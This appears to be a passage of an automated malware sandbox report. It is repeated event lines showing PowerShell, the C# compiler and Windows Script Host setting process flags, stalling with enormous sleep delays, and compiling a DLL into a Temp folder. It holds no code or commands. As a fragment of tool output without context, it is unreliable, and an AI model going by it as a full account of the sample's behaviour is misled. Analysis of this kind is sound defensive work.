        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3994Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5786Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6518Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3166Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1024Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 459Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5466Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4005Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.dllJump to dropped file
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260Thread sleep time: -20291418481080494s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep count: 6518 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7228Thread sleep time: -7378697629483816s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184Thread sleep count: 3166 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep count: 1024 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7548Thread sleep count: 97 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep count: 459 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7552Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7640Thread sleep count: 5466 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7644Thread sleep count: 4005 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7672Thread sleep time: -8301034833169293s >= -30000sJump to behavior
